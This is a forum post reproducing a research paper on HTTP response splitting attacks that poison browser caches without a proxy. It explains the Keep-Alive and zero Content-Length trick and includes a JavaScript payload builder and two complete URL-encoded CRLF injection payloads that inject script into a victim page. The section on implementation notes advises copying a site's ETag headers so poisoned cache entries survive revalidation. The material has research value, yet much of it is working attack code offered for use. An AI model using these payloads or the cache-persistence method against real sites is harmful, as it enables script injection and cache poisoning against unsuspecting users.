I've had this paper sitting around collecting dust for so long, but I've been keeping it for a reason: a friend (troopa) and I are trying to start a hacker/infosec community focused on research and development of ideas and attacks, rather than simply a teaching and learning ground - there are plenty of those already in existence, but very few places where people come together to collaborate on new ideas. And so I present to you Sudo Labs.

I initially posted the full paper on Sudo Labs here:

But now that I've directed a bit of traffic there (that really didn't help), I'm posting it here as well:

[EDIT (14/02/07)]: I've been informed, that my introduction was completely wrong and may have mislead people, and so I've replaced it.

HTTP Response Splitting Attacks Without Proxies

By kuza55
of Sudo labs


1.0 Introduction
2.0 The Attack
    2.1 Theory
    2.2 Browser Inconsistencies
    2.3 Working Exploits
3.0 Implementation Notes
4.0 Conclusion

1.0 Introduction

At the moment, the only known technique (AFAIK - correct me if I'm wrong) for attacking the browser cache, to alter the cache for pages other than the one vulnerable to HTTP Response Splitting, is the one proposed by Amit Klein on pages 19-21 of this paper:

It utilises the fact that IE operates on only 4 connections to request pages from a single server.

This paper will illustrate something similar.

2.0 The Attack

As many people before me have discovered: if you can force the browser to make a request for a page on a connection you control, you can replace the contents of the page.

The problem has been to force the browser to do just that.

But what if we ask nicely?

2.1 Theory

If in our doctored response we redirect the user to another page on our site and we send the browser the "Keep-Alive: timeout=300" and "Connection: Keep-Alive" headers the browser does exactly what we asked it and sends the request on that connection (except Opera 9, which doesn't want to - Opera 8 does).

The next thing we need to do is send the browser a "Content-Length: 0" header, so that it thinks it has received everything it is going to receive from its first request and sends the second request straight away.

We then send the browser a couple of new lines, and then lots of extraneous spaces and then a new line as well.

This works much like a NOP sled in a buffer overflow attack: it prepares a landing zone which the browser will simply ignore before reading the actual response, giving us greater flexibility with regard to browser inconsistencies and network latency.
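Putting the steps above together, the injected part of the doctored response can be built as one string. A sketch, with header values modelled on the working exploits later in this paper (the function name and the 500-space landing zone size are my own choices):

```javascript
// Build the injected portion of the split response: a zero-length
// first response (so the browser immediately sends its next request
// on the kept-alive connection), a "landing zone" of ignorable
// whitespace, and the fake second response we want the browser to
// treat as the next page.
function buildSplitPayload(fakeBody) {
  var firstResponseHeaders =
    'Keep-Alive: timeout=300\r\n' +
    'Connection: Keep-Alive\r\n' +
    'Content-Type: text/html\r\n' +
    'Content-Length: 0\r\n' +
    '\r\n';
  // Like a NOP sled: blank space the browser skips before the real
  // status line, absorbing read-boundary and latency inconsistencies.
  var landingZone = '\r\n\r\n' + new Array(501).join(' ') + '\r\n';
  var secondResponse =
    'HTTP/1.x 200 OK\r\n' +
    'Content-Type: text/html\r\n' +
    'Content-Length: ' + fakeBody.length + '\r\n' +
    '\r\n' + fakeBody;
  return firstResponseHeaders + landingZone + secondResponse;
}
```

In practice this string would be URL-encoded and placed in the header-injection point of the vulnerable page, as in the exploit URLs below.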

2.2 Browser Inconsistencies

Sadly, not all browsers react the same way, so not everything can be done easily. Here's a little chart of what I've been able to produce in various browsers so far:

1 = Second request made on the same connection
2 = Second response can be injected into
3 = Headers can be injected into the second response
4 = Content-Length header is strictly obeyed

+ = Yes
~ = Sort of
- = No
x = N/A

|Browser|1|2|3|4|
|Opera 8|+|+|+|+|
|IE 6   |+|+|+|~|
|Opera 9|-|-|-|x|

So essentially I've only really been able to exploit the attack's full potential under IE 6 and Opera 8; getting this to work under Firefox (and possibly Opera 9) is a task for people with more experience in how browsers interact with the network.

The issue with Internet Explorer is that it reads responses in 1024-byte blocks, so any Content-Length header which does not fall on that boundary will effectively be rounded up to the nearest kilobyte - but that's not much of an issue.

Internet Explorer also has a 2047-byte limit on query strings, so my original design of using new lines doesn't work, because they get encoded in the query string to three times their length (6 bytes - %0d%0a - instead of two), and so spaces had to be used as the whitespace to be ignored.
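The size difference is easy to verify (a quick illustration; the variable names are mine):

```javascript
// A CRLF pair triples in size when URL-encoded, while a literal space
// can be sent as-is, so spaces make a much cheaper "sled" inside
// IE's 2047-byte query string limit.
var encodedCRLF = encodeURIComponent('\r\n'); // "%0D%0A": 6 bytes for 2 chars
var sledOf100Spaces = new Array(101).join(' '); // 100 bytes, sent literally
```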

For some reason I can't seem to get Firefox to use the headers I provide, but you can easily inject into the top of the page and simply stop the browser rendering the rest by using an unclosed div tag with a display: none style attribute.

Opera 9 (as I mentioned earlier), though, just doesn't want to make the request on the same socket, so I haven't been able to get this attack to work there.

2.3 Working Exploits

Now, onto the interesting part - Working Exploits.

This *works* (To the extent explained above) in both IE and Firefox: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        %0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>

But it doesn't work on Opera 8. Opera 8 works the way you would sort of expect a browser to work, in that it begins reading the stream from where it left off, so we don't need to provide much whitespace: timeout=60%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 0%0d%0a%0d%0a%0d%0aHTTP/1.x 200 OK%0d%0aKeep-Alive: timeout=5%0d%0aConnection: Keep-Alive%0d%0aContent-Type: text/html%0d%0aContent-Length: 55%0d%0a%0d%0a<html><script>alert(document.location)</script></html>

3.0 Implementation Notes

If anyone wants to use this to perform browser cache poisoning attacks (either to hide the suspicious URL or something similar), the best way is probably to check whether the URL you are poisoning sends an ETag header, and if so, replicate that header, so that when the browser later makes a conditional request the web server will honestly say the resource hasn't changed. If the resource you want to poison is dynamic, you'll have to rely on the Cache-Control and Date headers alone (though these should be used along with the ETag header anyway).
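A sketch of the header-replication idea (the helper and its exact header set are my own illustration, not from the original attack):

```javascript
// When poisoning the cached copy of a resource, echo the real server's
// ETag so that the browser's later conditional requests keep getting
// honest 304 Not Modified answers, and the poisoned copy stays cached.
function buildPoisonedResponse(realEtag, body) {
  var headers = [
    'HTTP/1.x 200 OK',
    'Content-Type: text/html',
    'Cache-Control: max-age=86400',
    'Content-Length: ' + body.length
  ];
  if (realEtag) {
    headers.push('ETag: ' + realEtag); // replicated from the target URL
  }
  return headers.join('\r\n') + '\r\n\r\n' + body;
}
```

Without the replicated ETag, the first revalidation would fetch a fresh copy and silently undo the poisoning.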

4.0 Conclusion

So, as we can see, we don't need a proxy to implement interesting protocol-oriented HTTP Response Splitting attacks; hopefully someone with a deeper understanding of browsers than me can figure out why the above attacks aren't working in Firefox and Opera 9.